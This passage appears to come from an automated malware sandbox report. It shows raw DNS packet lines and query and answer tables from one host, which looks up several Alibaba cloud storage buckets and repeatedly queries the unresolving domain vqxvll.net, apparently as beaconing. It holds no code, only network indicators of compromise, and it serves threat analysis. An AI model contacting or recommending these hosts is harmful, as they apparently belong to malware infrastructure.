                                                                        Jan 14, 2025 05:16:31.148766994 CET5114053192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:16:31.251244068 CET53511401.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:16:36.163386106 CET6395253192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:16:36.268572092 CET53639521.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:16:41.162183046 CET5354053192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:16:41.262715101 CET53535401.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:16:46.161317110 CET4945853192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:16:46.263060093 CET53494581.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:16:51.159930944 CET6421453192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:16:51.301306009 CET6421453192.168.11.209.9.9.9
                                                                        Jan 14, 2025 05:16:51.323810101 CET53642141.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:16:51.402558088 CET53642149.9.9.9192.168.11.20
                                                                        Jan 14, 2025 05:16:56.158857107 CET5276753192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:16:56.261826992 CET53527671.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:17:01.157819986 CET6096853192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:17:01.259063959 CET53609681.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:17:06.156958103 CET5604753192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:17:06.260236025 CET53560471.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:17:11.155556917 CET5210453192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:17:11.257735968 CET53521041.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:17:16.154705048 CET6169153192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:17:16.255934954 CET53616911.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:17:21.153448105 CET5591753192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:17:21.283869982 CET53559171.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:17:26.152376890 CET4970753192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:17:26.253545046 CET53497071.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:17:31.152220964 CET6374353192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:17:31.253135920 CET53637431.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:17:36.150191069 CET5430953192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:17:36.251029968 CET53543091.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:17:41.149178028 CET5015753192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:17:41.249773026 CET53501571.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:17:46.163615942 CET6026553192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:17:46.265554905 CET53602651.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:17:51.162552118 CET6550553192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:17:51.263927937 CET53655051.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:17:56.161492109 CET5429753192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:17:56.263178110 CET53542971.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:18:01.161199093 CET6312853192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:18:01.261929035 CET53631281.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:18:06.159363031 CET6332353192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:18:06.260540962 CET53633231.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:18:11.158162117 CET5897653192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:18:11.259990931 CET53589761.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:18:12.962646008 CET5584453192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:18:13.095437050 CET5584453192.168.11.209.9.9.9
                                                                        Jan 14, 2025 05:18:13.197916031 CET53558449.9.9.9192.168.11.20
                                                                        Jan 14, 2025 05:18:13.822454929 CET53558441.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:18:16.157243013 CET5903753192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:18:16.291542053 CET53590371.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:18:21.155961037 CET6534353192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:18:21.256675959 CET53653431.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:18:26.154993057 CET6443953192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:18:26.255892038 CET53644391.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:18:31.153906107 CET6515253192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:18:31.260607958 CET53651521.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:18:36.152993917 CET5509553192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:18:36.254328012 CET53550951.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:18:41.151623011 CET5810353192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:18:41.254609108 CET53581031.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:18:47.978382111 CET5533753192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:18:48.112083912 CET53553371.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:18:54.133235931 CET5611153192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:18:54.235502005 CET53561111.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:19:00.256869078 CET6403453192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:19:00.357979059 CET53640341.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:19:06.380784988 CET6419353192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:19:06.482357979 CET53641931.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:19:12.505108118 CET4917453192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:19:12.606764078 CET53491741.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:19:18.627949953 CET5123853192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:19:18.729330063 CET53512381.1.1.1192.168.11.20
                                                                        Jan 14, 2025 05:19:24.751588106 CET5461753192.168.11.201.1.1.1
                                                                        Jan 14, 2025 05:19:24.852226019 CET53546171.1.1.1192.168.11.20

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Jan 14, 2025 05:10:57.204159975 CET192.168.11.201.1.1.10x438Standard query (0)vien3h.oss-cn-beijing.aliyuncs.comA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:12:12.671762943 CET192.168.11.201.1.1.10xf59aStandard query (0)22mm.oss-cn-hangzhou.aliyuncs.comA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:12:53.207953930 CET192.168.11.201.1.1.10xc4a5Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:12:59.367248058 CET192.168.11.201.1.1.10x4b27Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:13:05.491422892 CET192.168.11.201.1.1.10xf189Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:13:11.614516020 CET192.168.11.201.1.1.10xc6dfStandard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:13:17.784975052 CET192.168.11.201.1.1.10x649bStandard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:13:23.940301895 CET192.168.11.201.1.1.10x3a41Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:13:30.063613892 CET192.168.11.201.1.1.10x10e9Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:13:35.359395981 CET192.168.11.201.1.1.10xee84Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:13:41.420543909 CET192.168.11.201.1.1.10x1f17Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:13:47.028831005 CET192.168.11.201.1.1.10x1c0eStandard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:13:51.449480057 CET192.168.11.201.1.1.10x9e47Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:13:56.276648998 CET192.168.11.201.1.1.10xb608Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:14:01.150371075 CET192.168.11.201.1.1.10x2fd4Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:14:06.149137974 CET192.168.11.201.1.1.10xa7e2Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:14:11.148158073 CET192.168.11.201.1.1.10x76ddStandard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:14:16.147180080 CET192.168.11.201.1.1.10xc5e5Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:14:21.145895004 CET192.168.11.201.1.1.10x7b7aStandard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:14:26.160412073 CET192.168.11.201.1.1.10xc9c9Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:14:31.159507990 CET192.168.11.201.1.1.10xe2e3Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:14:36.158358097 CET192.168.11.201.1.1.10x6174Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:14:41.157139063 CET192.168.11.201.1.1.10x7555Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:14:46.156056881 CET192.168.11.201.1.1.10x1f95Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:14:51.155714035 CET192.168.11.201.1.1.10xe5b2Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:14:56.153960943 CET192.168.11.201.1.1.10xa1cStandard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:15:01.152828932 CET192.168.11.201.1.1.10xeff7Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:15:06.151746988 CET192.168.11.201.1.1.10xd466Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:15:11.150634050 CET192.168.11.201.1.1.10x678aStandard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:15:16.149523020 CET192.168.11.201.1.1.10xebdcStandard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:15:21.148500919 CET192.168.11.201.1.1.10x806fStandard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:15:26.147471905 CET192.168.11.201.1.1.10x48c2Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:15:31.161933899 CET192.168.11.201.1.1.10x6c9bStandard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:15:36.160902023 CET192.168.11.201.1.1.10xb793Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:15:41.159699917 CET192.168.11.201.1.1.10x1700Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:15:46.158787966 CET192.168.11.201.1.1.10xb559Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:15:51.157471895 CET192.168.11.201.1.1.10xee75Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:15:56.156359911 CET192.168.11.201.1.1.10xe249Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:16:01.155255079 CET192.168.11.201.1.1.10x1cf5Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:16:05.397124052 CET192.168.11.201.1.1.10x36a7Standard query (0)upitem.oss-cn-hangzhou.aliyuncs.comA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:16:06.154254913 CET192.168.11.201.1.1.10xd2ecStandard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:16:11.153374910 CET192.168.11.201.1.1.10x3f5cStandard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:16:16.152429104 CET192.168.11.201.1.1.10x69c4Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:16:21.150974989 CET192.168.11.201.1.1.10xbdaeStandard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:16:26.149818897 CET192.168.11.201.1.1.10x9a52Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:16:31.148766994 CET192.168.11.201.1.1.10xd394Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:16:36.163386106 CET192.168.11.201.1.1.10x5af7Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:16:41.162183046 CET192.168.11.201.1.1.10x3277Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:16:46.161317110 CET192.168.11.201.1.1.10x8a8fStandard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:16:51.159930944 CET192.168.11.201.1.1.10x17e0Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:16:51.301306009 CET192.168.11.209.9.9.90x17e0Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:16:56.158857107 CET192.168.11.201.1.1.10xe0bbStandard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:17:01.157819986 CET192.168.11.201.1.1.10x37a2Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:17:06.156958103 CET192.168.11.201.1.1.10x53c2Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:17:11.155556917 CET192.168.11.201.1.1.10xa2b3Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:17:16.154705048 CET192.168.11.201.1.1.10x35fcStandard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:17:21.153448105 CET192.168.11.201.1.1.10xfa50Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:17:26.152376890 CET192.168.11.201.1.1.10xf283Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:17:31.152220964 CET192.168.11.201.1.1.10x6ac7Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:17:36.150191069 CET192.168.11.201.1.1.10xc86Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:17:41.149178028 CET192.168.11.201.1.1.10x132bStandard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:17:46.163615942 CET192.168.11.201.1.1.10xe59cStandard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:17:51.162552118 CET192.168.11.201.1.1.10xc4eeStandard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:17:56.161492109 CET192.168.11.201.1.1.10x8063Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:18:01.161199093 CET192.168.11.201.1.1.10x93c4Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:18:06.159363031 CET192.168.11.201.1.1.10xdfecStandard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:18:11.158162117 CET192.168.11.201.1.1.10x5d72Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:18:12.962646008 CET192.168.11.201.1.1.10x9bbdStandard query (0)upitem.oss-cn-hangzhou.aliyuncs.comA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:18:13.095437050 CET192.168.11.209.9.9.90x9bbdStandard query (0)upitem.oss-cn-hangzhou.aliyuncs.comA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:18:16.157243013 CET192.168.11.201.1.1.10x3c95Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:18:21.155961037 CET192.168.11.201.1.1.10xd221Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:18:26.154993057 CET192.168.11.201.1.1.10x92d8Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:18:31.153906107 CET192.168.11.201.1.1.10xb80eStandard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:18:36.152993917 CET192.168.11.201.1.1.10x477bStandard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:18:41.151623011 CET192.168.11.201.1.1.10x3c62Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:18:47.978382111 CET192.168.11.201.1.1.10x7962Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:18:54.133235931 CET192.168.11.201.1.1.10x6a96Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:19:00.256869078 CET192.168.11.201.1.1.10xc469Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:19:06.380784988 CET192.168.11.201.1.1.10xb42cStandard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:19:12.505108118 CET192.168.11.201.1.1.10xe752Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:19:18.627949953 CET192.168.11.201.1.1.10x40b3Standard query (0)vqxvll.netA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:19:24.751588106 CET192.168.11.201.1.1.10x659eStandard query (0)vqxvll.netA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Jan 14, 2025 05:10:58.175978899 CET1.1.1.1192.168.11.200x438No error (0)vien3h.oss-cn-beijing.aliyuncs.comsc-20ih.cn-beijing.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 14, 2025 05:10:58.175978899 CET1.1.1.1192.168.11.200x438No error (0)sc-20ih.cn-beijing.oss-adns.aliyuncs.comsc-20ih.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 14, 2025 05:10:58.175978899 CET1.1.1.1192.168.11.200x438No error (0)sc-20ih.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com39.103.20.17A (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:12:13.533178091 CET1.1.1.1192.168.11.200xf59aNo error (0)22mm.oss-cn-hangzhou.aliyuncs.comsc-29j7.cn-hangzhou.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 14, 2025 05:12:13.533178091 CET1.1.1.1192.168.11.200xf59aNo error (0)sc-29j7.cn-hangzhou.oss-adns.aliyuncs.comsc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 14, 2025 05:12:13.533178091 CET1.1.1.1192.168.11.200xf59aNo error (0)sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com118.178.60.9A (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:12:53.338002920 CET1.1.1.1192.168.11.200xc4a5Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:12:59.471040010 CET1.1.1.1192.168.11.200x4b27Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:13:05.594619036 CET1.1.1.1192.168.11.200xf189Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:13:11.763982058 CET1.1.1.1192.168.11.200xc6dfName error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:13:17.914856911 CET1.1.1.1192.168.11.200x649bName error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:13:24.041477919 CET1.1.1.1192.168.11.200x3a41Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:13:30.213601112 CET1.1.1.1192.168.11.200x10e9Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:13:35.462896109 CET1.1.1.1192.168.11.200xee84Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:13:41.523992062 CET1.1.1.1192.168.11.200x1f17Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:13:47.132245064 CET1.1.1.1192.168.11.200x1c0eName error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:13:51.552684069 CET1.1.1.1192.168.11.200x9e47Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:13:56.380443096 CET1.1.1.1192.168.11.200xb608Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:14:01.253945112 CET1.1.1.1192.168.11.200x2fd4Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:14:06.252711058 CET1.1.1.1192.168.11.200xa7e2Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:14:11.250919104 CET1.1.1.1192.168.11.200x76ddName error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:14:16.249376059 CET1.1.1.1192.168.11.200xc5e5Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:14:21.249178886 CET1.1.1.1192.168.11.200x7b7aName error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:14:26.265156031 CET1.1.1.1192.168.11.200xc9c9Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:14:31.262764931 CET1.1.1.1192.168.11.200xe2e3Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:14:36.259541988 CET1.1.1.1192.168.11.200x6174Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:14:41.258558989 CET1.1.1.1192.168.11.200x7555Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:14:46.260288954 CET1.1.1.1192.168.11.200x1f95Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:14:51.260515928 CET1.1.1.1192.168.11.200xe5b2Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:14:56.256253004 CET1.1.1.1192.168.11.200xa1cName error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:15:01.254369974 CET1.1.1.1192.168.11.200xeff7Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:15:06.252660990 CET1.1.1.1192.168.11.200xd466Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:15:11.254977942 CET1.1.1.1192.168.11.200x678aName error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:15:16.253957033 CET1.1.1.1192.168.11.200xebdcName error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:15:21.252125978 CET1.1.1.1192.168.11.200x806fName error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:15:26.249975920 CET1.1.1.1192.168.11.200x48c2Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:15:31.266736031 CET1.1.1.1192.168.11.200x6c9bName error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:15:36.261909008 CET1.1.1.1192.168.11.200xb793Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:15:41.262761116 CET1.1.1.1192.168.11.200x1700Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:15:46.260209084 CET1.1.1.1192.168.11.200xb559Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:15:51.258359909 CET1.1.1.1192.168.11.200xee75Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:15:56.257049084 CET1.1.1.1192.168.11.200xe249Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:16:01.288924932 CET1.1.1.1192.168.11.200x1cf5Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:16:06.054588079 CET1.1.1.1192.168.11.200x36a7No error (0)upitem.oss-cn-hangzhou.aliyuncs.comsc-29h5.cn-hangzhou.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 14, 2025 05:16:06.054588079 CET1.1.1.1192.168.11.200x36a7No error (0)sc-29h5.cn-hangzhou.oss-adns.aliyuncs.comsc-29h5.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 14, 2025 05:16:06.054588079 CET1.1.1.1192.168.11.200x36a7No error (0)sc-29h5.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com118.178.60.103A (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:16:06.256436110 CET1.1.1.1192.168.11.200xd2ecName error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:16:11.263638020 CET1.1.1.1192.168.11.200x3f5cName error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:16:16.255970001 CET1.1.1.1192.168.11.200x69c4Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:16:21.252113104 CET1.1.1.1192.168.11.200xbdaeName error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:16:26.252258062 CET1.1.1.1192.168.11.200x9a52Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:16:31.251244068 CET1.1.1.1192.168.11.200xd394Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:16:36.268572092 CET1.1.1.1192.168.11.200x5af7Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:16:41.262715101 CET1.1.1.1192.168.11.200x3277Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:16:46.263060093 CET1.1.1.1192.168.11.200x8a8fName error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:16:51.323810101 CET1.1.1.1192.168.11.200x17e0Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:16:51.402558088 CET9.9.9.9192.168.11.200x17e0Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:16:56.261826992 CET1.1.1.1192.168.11.200xe0bbName error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:17:01.259063959 CET1.1.1.1192.168.11.200x37a2Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:17:06.260236025 CET1.1.1.1192.168.11.200x53c2Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:17:11.257735968 CET1.1.1.1192.168.11.200xa2b3Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:17:16.255934954 CET1.1.1.1192.168.11.200x35fcName error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:17:21.283869982 CET1.1.1.1192.168.11.200xfa50Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
                                                                        Jan 14, 2025 05:17:26.253545046 CET1.1.1.1192.168.11.200xf283Name error (3)vqxvll.netnonenoneA (IP address)IN (0x0001)false
